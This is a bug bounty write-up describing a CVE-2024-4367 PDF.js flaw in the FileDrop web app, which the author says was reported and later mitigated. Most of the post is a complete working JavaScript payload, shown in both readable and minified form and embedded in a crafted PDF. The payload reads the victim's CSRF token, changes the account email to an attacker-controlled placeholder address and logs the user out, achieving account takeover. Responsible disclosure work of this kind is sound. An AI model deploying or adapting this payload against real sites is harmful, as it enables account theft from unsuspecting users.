Post

FileDrop One Click ATO

Posted Updated
By Israel Hammon 2 min read

This web application is vulnerable to CVE-2024-4367, a result of containing a vulnerable version of the PDF.js library.

https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/

With this vulnerability an attacker can leverage execution of JavaScript for a full account takeover. I have created a POC to demonstrate the severity of this vulnerability.

Once the infected PDF is viewed by the signed in user, it triggers an email change to one controlled by the attacker. It then logs the user out, and with no knowledge of what the email was changed to, recovery is not possible through traditional means.

I used this PoC python script to generate the actual pdf file payload needed, as getting the syntax correct for this to work was challenging at first. Below is the final payload used (un-minified):

Original Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

let pageUrl = 'https://app.getfiledrop.com/profile';

async function fetchAndExtractValue(url) {

  try { let response = await fetch(url);
    let htmlText = await response.text();
    let parser = new DOMParser();
    let doc = parser.parseFromString(htmlText, 'text/html');
    let nameInput = doc.getElementById('name')['value'];
    let csrfInput = doc.querySelectorAll('meta')[2]['content'];
    let myReturn = [nameInput, csrfInput];
    return myReturn;
  } catch (error) {
    return null;
  }
}

async function postData(data) {
	let payload1 = '_token=';
	let payload2 = '&_method=patch&name=';
	let payload3 = '&email=ATTACKEREMAIL%40ATTACKERDOMAIN.net';
	let data1 = data[1];
	let data2 = data[0];
	let totalpay = payload1 + data1 + payload2 + data2 + payload3;
	let xhr = new XMLHttpRequest();
	xhr.open('POST', pageUrl, true);
	xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
	await xhr.send(totalpay);
}
async function postdataLogOut(data){
    let payload1= "_token=" + data[1];
    let r = new XMLHttpRequest();
    r.open('POST','https://app.getfiledrop.com/logout',true);
    r.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    await r.send(payload1);
}
fetchAndExtractValue(pageUrl).then(persInfo => {
    postData(persInfo);
    postdataLogOut(persInfo);
});

Minified Code

1

let pageUrl='https://app.getfiledrop.com/profile';async function fetchAndExtractValue(t){try{let e=await fetch(t),a=await e.text(),n=(new DOMParser).parseFromString(a,'text/html');return[n.getElementById('name').value,n.querySelectorAll('meta')[2].content]}catch(t){return null}}async function postData(t){let e='_token='+t[1]+'&_method=patch&name='+t[0]+'&email=ATTACKEREMAIL%40ATTACKERDOMAIN.net',a=new XMLHttpRequest;a.open('POST',pageUrl,true),a.setRequestHeader('Content-Type','application/x-www-form-urlencoded'),await a.send(e)}async function postdataLogOut(t){let e='_token='+t[1],a=new XMLHttpRequest;a.open('POST','https://app.getfiledrop.com/logout',true),a.setRequestHeader('Content-Type','application/x-www-form-urlencoded'),await a.send(e)}fetchAndExtractValue(pageUrl).then((t=>{postData(t),postdataLogOut(t)}));

PoC in action

Follow-Up

The vulnerability on this site has since been mitigated after a couple weeks of notification to the site owner.

bug bounty
writeup bug bounty
This post is licensed under CC BY 4.0 by the author.